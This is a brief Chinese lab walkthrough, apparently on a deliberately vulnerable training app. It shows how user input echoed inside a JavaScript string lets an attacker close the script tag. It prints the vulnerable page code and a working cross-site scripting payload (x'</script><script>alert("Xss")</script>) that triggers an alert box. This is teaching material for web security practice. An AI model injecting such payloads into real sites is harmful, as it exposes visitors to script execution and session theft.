12.xss之js输出

12.xss之js输出

后台源码文件

输出的源码

输入1111之后能看到心中所爱

查看页面代码元素，1111在js中，如图所示：

接下来将这段代码复制出来进行编辑攻击代码

<script>
    $ms='x'</script><script>alert("Xss")</script>';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }

</script>

根据上面的代码编辑攻击代码，将前端代码中的script闭合，后面的script进行做攻击代码即可。

x'</script><script>alert("Xss")</script>

将编辑好的代码直接输入提交，会直接弹出xss界面